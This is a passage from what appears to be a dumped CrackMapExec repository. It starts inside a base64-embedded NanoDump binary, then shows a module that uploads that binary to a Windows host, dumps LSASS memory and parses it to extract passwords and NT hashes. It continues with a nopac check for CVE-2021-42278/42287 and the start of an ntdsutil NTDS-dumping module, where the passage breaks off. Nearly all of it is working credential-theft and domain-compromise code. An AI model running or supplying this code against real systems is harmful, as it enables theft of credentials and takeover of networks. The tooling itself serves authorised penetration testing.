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B/QADwfkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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\"\n )\n self.nano = \"nano.exe\"\n self.nano_path = \"\"\n self.useembeded = True\n\n if \"NANO_PATH\" in module_options:\n self.nano_path = module_options[\"NANO_PATH\"]\n self.useembeded = False\n else:\n if sys.platform == \"win32\":\n appdata_path = os.getenv(\"APPDATA\")\n if not os.path.exists(appdata_path + \"\\CME\"):\n os.mkdir(appdata_path + \"\\CME\")\n self.nano_path = appdata_path + \"\\CME\\\\\"\n else:\n if not os.path.exists(\"/tmp/cme/\"):\n os.mkdir(\"/tmp/cme/\")\n self.nano_path = \"/tmp/cme/\"\n\n self.dir_result = self.nano_path\n\n if \"NANO_EXE_NAME\" in module_options:\n self.nano = module_options[\"NANO_EXE_NAME\"]\n self.useembeded = False\n\n if \"TMP_DIR\" in module_options:\n self.tmp_dir = module_options[\"TMP_DIR\"]\n\n if \"DIR_RESULT\" in module_options:\n self.dir_result = module_options[\"DIR_RESULT\"]\n\n def on_admin_login(self, context, connection):\n self.connection = connection\n self.context = context\n if self.useembeded:\n with open(self.nano_path + self.nano, \"wb\") as nano:\n if self.connection.os_arch == 32 and self.context.protocol == \"smb\":\n self.context.log.display(\"32-bit Windows detected.\")\n nano.write(self.nano_embedded32)\n elif self.connection.os_arch == 64 and self.context.protocol == \"smb\":\n self.context.log.display(\"64-bit Windows detected.\")\n nano.write(self.nano_embedded64)\n elif self.context.protocol == \"mssql\":\n nano.write(self.nano_embedded64)\n else:\n self.context.log.fail(\"Unsupported Windows architecture\")\n sys.exit(1)\n\n if self.context.protocol == \"smb\":\n with open(self.nano_path + self.nano, \"rb\") as nano:\n try:\n self.connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read)\n self.context.log.success(f\"Created file {self.nano} on the \\\\\\\\{self.share}{self.tmp_share}\")\n except Exception as e:\n self.context.log.fail(f\"Error writing file to share {self.share}: {e}\")\n else:\n with open(self.nano_path + self.nano, \"rb\") as nano:\n try:\n self.context.log.display(f\"Copy {self.nano} to {self.tmp_dir}\")\n exec_method = MSSQLEXEC(self.connection.conn)\n exec_method.put_file(nano.read(), self.tmp_dir + self.nano)\n if exec_method.file_exists(self.tmp_dir + self.nano):\n self.context.log.success(f\"Created file {self.nano} on the remote machine {self.tmp_dir}\")\n else:\n self.context.log.fail(\"File does not exist on the remote system... error during upload\")\n sys.exit(1)\n except Exception as e:\n self.context.log.fail(f\"Error writing file to remote machine directory {self.tmp_dir}: {e}\")\n\n # apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display())\n # if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the\n # execution fails, which it doesn't\n display_output = True if self.context.protocol == \"smb\" else False\n self.context.log.debug(f\"Display Output: {display_output}\")\n # get LSASS PID via `tasklist`\n command = 'tasklist /v /fo csv | findstr /i \"lsass\"'\n self.context.log.display(f\"Getting LSASS PID via command {command}\")\n p = self.connection.execute(command, display_output)\n self.context.log.debug(f\"tasklist Command Result: {p}\")\n if len(p) == 1:\n p = p[0]\n\n if not p or p == \"None\":\n self.context.log.fail(f\"Failed to execute command to get LSASS PID\")\n return\n\n pid = p.split(\",\")[1][1:-1]\n self.context.log.debug(f\"pid: {pid}\")\n timestamp = datetime.today().strftime(\"%Y%m%d_%H%M\")\n nano_log_name = f\"{timestamp}.log\"\n command = f\"{self.tmp_dir}{self.nano} --pid {pid} --write {self.tmp_dir}{nano_log_name}\"\n self.context.log.display(f\"Executing command {command}\")\n\n p = self.connection.execute(command, display_output)\n self.context.log.debug(f\"NanoDump Command Result: {p}\")\n\n if not p or p == \"None\":\n self.context.log.fail(f\"Failed to execute command to execute NanoDump\")\n self.delete_nanodump_binary()\n return\n\n # results returned are different between SMB and MSSQL\n full_results = \" \".join(p) if self.context.protocol == \"mssql\" else p\n\n if \"Done\" in full_results:\n self.context.log.success(\"Process lsass.exe was successfully dumped\")\n dump = True\n else:\n self.context.log.fail(\"Process lsass.exe error on dump, try with verbose\")\n dump = False\n\n if dump:\n self.context.log.display(f\"Copying {nano_log_name} to host\")\n filename = f\"{self.dir_result}{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log\"\n if self.context.protocol == \"smb\":\n with open(filename, \"wb+\") as dump_file:\n try:\n self.connection.conn.getFile(self.share, self.tmp_share + nano_log_name, dump_file.write)\n self.context.log.success(f\"Dumpfile of lsass.exe was transferred to {filename}\")\n except Exception as e:\n self.context.log.fail(f\"Error while getting file: {e}\")\n\n try:\n self.connection.conn.deleteFile(self.share, self.tmp_share + self.nano)\n self.context.log.success(f\"Deleted nano file on the {self.share} share\")\n except Exception as e:\n self.context.log.fail(f\"Error deleting nano file on share {self.share}: {e}\")\n\n try:\n self.connection.conn.deleteFile(self.share, self.tmp_share + nano_log_name)\n self.context.log.success(f\"Deleted lsass.dmp file on the {self.share} share\")\n except Exception as e:\n self.context.log.fail(f\"Error deleting lsass.dmp file on share {self.share}: {e}\")\n else:\n try:\n exec_method = MSSQLEXEC(self.connection.conn)\n exec_method.get_file(self.tmp_dir + nano_log_name, filename)\n self.context.log.success(f\"Dumpfile of lsass.exe was transferred to {filename}\")\n except Exception as e:\n self.context.log.fail(f\"Error while getting file: {e}\")\n\n self.delete_nanodump_binary()\n\n try:\n self.connection.execute(f\"del {self.tmp_dir + nano_log_name}\")\n self.context.log.success(f\"Deleted lsass.dmp file on the {self.tmp_dir} dir\")\n except Exception as e:\n self.context.log.fail(f\"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}\")\n\n fh = open(filename, \"r+b\")\n fh.seek(0)\n fh.write(b\"\\x4d\\x44\\x4d\\x50\")\n fh.seek(4)\n fh.write(b\"\\xa7\\x93\")\n fh.seek(6)\n fh.write(b\"\\x00\\x00\")\n fh.close()\n\n with open(filename, \"rb\") as dump:\n try:\n bh_creds = []\n try:\n pypy_parse = pypykatz.parse_minidump_external(dump)\n except Exception as e:\n pypy_parse = None\n self.context.log.fail(f\"Error parsing minidump: {e}\")\n\n ssps = [\n \"msv_creds\",\n \"wdigest_creds\",\n \"ssp_creds\",\n \"livessp_creds\",\n \"kerberos_creds\",\n \"credman_creds\",\n \"tspkg_creds\",\n ]\n\n for luid in pypy_parse.logon_sessions:\n for ssp in ssps:\n for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):\n domain = getattr(cred, \"domainname\", None)\n username = getattr(cred, \"username\", None)\n password = getattr(cred, \"password\", None)\n NThash = getattr(cred, \"NThash\", None)\n if NThash is not None:\n NThash = NThash.hex()\n if username and (password or NThash) and \"$\" not in username:\n if password:\n credtype = \"password\"\n credential = password\n else:\n credtype = \"hash\"\n credential = NThash\n self.context.log.highlight(f\"{domain}\\\\{username}:{credential}\")\n host_id = self.context.db.get_hosts(self.connection.host)[0][0]\n self.context.db.add_credential(\n credtype,\n connection.domain,\n username,\n credential,\n pillaged_from=host_id,\n )\n if \".\" not in domain and domain.upper() in self.connection.domain.upper():\n domain = self.connection.domain\n bh_creds.append(\n {\n \"username\": username.upper(),\n \"domain\": domain.upper(),\n }\n )\n if len(bh_creds) > 0:\n add_user_bh(bh_creds, None, self.context.log, self.connection.config)\n except Exception as e:\n self.context.log.fail(f\"Error opening dump file: {e}\")\n\n def delete_nanodump_binary(self):\n try:\n self.connection.execute(f\"del {self.tmp_dir + self.nano}\")\n self.context.log.success(f\"Deleted nano file on the {self.share} dir\")\n except Exception as e:\n self.context.log.fail(f\"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}\")\n" }, { "path": "cme/modules/nopac.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n# @exploitph @Evi1cg\n# module by @mpgn_x64\n\nfrom binascii import unhexlify\nfrom impacket.krb5.kerberosv5 import getKerberosTGT\nfrom impacket.krb5 import constants\nfrom impacket.krb5.types import Principal\n\n\nclass CMEModule:\n name = \"nopac\"\n description = \"Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_login(self, context, connection):\n user_name = Principal(connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n try:\n tgt_with_pac, cipher, old_session_key, session_key = getKerberosTGT(\n user_name,\n connection.password,\n connection.domain,\n unhexlify(connection.lmhash),\n unhexlify(connection.nthash),\n connection.aesKey,\n connection.host,\n requestPAC=True,\n )\n context.log.highlight(\"TGT with PAC size \" + str(len(tgt_with_pac)))\n tgt_no_pac, cipher, old_session_key, session_key = getKerberosTGT(\n user_name,\n connection.password,\n connection.domain,\n unhexlify(connection.lmhash),\n unhexlify(connection.nthash),\n connection.aesKey,\n connection.host,\n requestPAC=False,\n )\n context.log.highlight(\"TGT without PAC size \" + str(len(tgt_no_pac)))\n if len(tgt_no_pac) < len(tgt_with_pac):\n context.log.highlight(\"\")\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://github.com/Ridter/noPac\")\n except OSError as e:\n context.log.debug(f\"Error connecting to Kerberos (port 88) on {connection.host}\")\n" }, { "path": "cme/modules/ntdsutil.py", "content": "import os\nimport shutil\nimport tempfile\nimport time\n\nfrom impacket.examples.secretsdump import LocalOperations, NTDSHashes\n\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.misc import validate_ntlm\n\n\nclass CMEModule:\n \"\"\"\n Dump NTDS with ntdsutil\n Module by @zblurx\n\n \"\"\"\n\n name = \"ntdsutil\"\n description = \"Dump NTDS with ntdsutil\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n \"\"\"\n Dump NTDS with ntdsutil\n Module by @zblurx\n\n DIR_RESULT Local dir to write ntds dump. If specified, the local dump will not be deleted after parsing\n \"\"\"\n self.share = \"ADMIN$\"\n self.tmp_dir = \"C:\\\\Windows\\\\Temp\\\\\"\n self.tmp_share = self.tmp_dir.split(\"C:\\\\Windows\\\\\")[1]\n self.dump_location = str(time.time())[:9]\n self.dir_result = self.dir_result = tempfile.mkdtemp()\n self.no_delete = False\n\n if \"DIR_RESULT\" in module_options:\n self.dir_result = os.path.abspath(module_options[\"DIR_RESULT\"])\n self.no_delete = True\n\n def on_admin_login(self, context, connection):\n command = \"powershell \\\"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\\\"\" % (self.tmp_dir, self.dump_location)\n context.log.display(\"Dumping ntds with 